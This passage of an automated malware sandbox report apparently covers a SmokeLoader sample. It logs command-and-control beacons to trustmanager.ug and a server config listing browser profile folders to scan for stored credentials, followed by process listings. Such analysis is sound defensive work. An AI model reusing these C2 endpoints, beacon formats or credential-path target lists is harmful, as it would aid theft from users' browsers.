Aug 23, 2021 02:09:09.680604935 CEST	17280	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 23 Aug 2021 00:09:19 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Aug 23, 2021 02:09:17.279186010 CEST	18345	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 188.124.36.242:25802 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Aug 23, 2021 02:09:19.759696007 CEST	19692	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 23 Aug 2021 00:09:29 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	192.168.2.3	49824	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:08.239398003 CEST	16875	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:08.265212059 CEST	16877	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:08.265223980 CEST	16877	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	192.168.2.3	49825	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:08.453891993 CEST	16878	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:08.481710911 CEST	16879	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:08.481750965 CEST	16879	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Aug 23, 2021 02:08:58.084319115 CEST	162.159.134.233	443	192.168.2.3	49753	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Aug 23, 2021 02:08:58.084319115 CEST	162.159.134.233	443	192.168.2.3	49753	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: xuTyOmef1g.exe PID: 1404 Parent PID: 5360

General

Start time:	02:07:07
Start date:	23/08/2021
Path:	C:\Users\user\Desktop\xuTyOmef1g.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\xuTyOmef1g.exe'
Imagebase:	0x400000
File size:	241664 bytes
MD5 hash:	5C65AF376BFF0067A2109686755B36DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.272458883.0000000002530000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.272499037.0000000002551000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 1404

General

Start time:	02:07:14
Start date:	23/08/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4332 Parent PID: 568

General

Start time:	02:07:17
Start date:	23/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5500 Parent PID: 568

General

Start time:	02:07:25
Start date:	23/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5544 Parent PID: 568

General

Start time:	02:07:36
Start date:	23/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4216 Parent PID: 568

General

Start time:	02:07:36
Start date:	23/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 3416 Parent PID: 568

General

Start time:	02:07:37
Start date:	23/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
